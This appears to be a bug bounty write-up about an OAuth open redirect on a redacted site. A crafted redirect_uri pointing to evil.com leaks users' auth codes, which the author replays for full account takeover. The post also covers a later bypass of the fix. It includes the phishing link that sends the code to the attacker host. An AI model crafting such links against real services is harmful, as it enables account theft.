Never underestimate the power of open redirect, a story of a full account takeover

بسم الله الرحمن الرحيم

 It is a private program I have being hacking on for months, one night I realised that they added another security layer, a second factor authentication(2FA), like every bug bounty hunter I tried to see if I can bypass the 2FA mechanics, I tried bruteforce attacks but that did n't work as I got rate limited after sending few invalid codes using burp suite intruder, I tried response manipulation(and status code manipulation) but failed too, I then gave up and sleep.

Next day I revisit the website to understand how the 2FA works properly, but this time around I am very careful of everything that is happening, I got the bug without even using any tool. Let's break it down.

Note: Let's assume the target is redacted.com

- Whenever a user tries to login to partners.redacted.com with valid credentials, he will be redirected to

https://pin.redacted.com/?client_id=cpp&response_type=code&redirect_uri=https:%252F%252Fredacted.com%252F.........

-I did what I know you will do too , you will change the redirect_uri right? But open redirect is out of scope in the program policy, I changed redacted.com to evil.com and surprisingly I got redirected to

https://evil.con/shell-auth?code=<access-token-here>&state=... I am kind a wowww, I am able to leak the victim's auth-token/access-token.

-Yet this is not valid except if I can use that token, I then open a new Incognito tab and paste https://evil.com/shell-auth?code=<access-token-here>&state=... and change it to https://redacted.com/shell-auth?code=<access-token-here>&state=... nothing happen because redacted.com does not have any login functionality.

-I then try https://partners.redacted.com/shell-auth?code=<access-token-here>&state=..., nice one,I am able to login to https://partners.redacted.com with that code, also I am able to other subdomains such as marketing.redacted.com with that code.

If you understand the flow this is a single click account takeover bug, an attacker only need to share this link

https://pin.redacted.com/?client_id=cpp&response_type=code&redirect_uri=https:%252F%252Fevil.com%252F... with the victim, once the victim click on the link his auth-token will be leaked on the attacker's server, an the attacker will be able to login to the victim's account on partners.redacted.com or marketing.redacted.com.

Timeline:

Reported: Jul 30th 2022

Triaged: Aug 1st 2022

Rewarded: Aug 4th 2022

Closed as resolved: Aug 4th 2022

Fix bypass:

After some days I noticed that the redirection is not patched, what happen is that user will just get error message when the redirect_uri is not whitelisted domain but he will still be redirected to the malicious site if he request a new code and now he must enter the code before he will be redirected the attacker's domain.

I created a new ticket and same bounty was paid as in the first report.

Suggestions  and corrections are always welcome.

*

Post a Comment (0)
Previous Post Next Post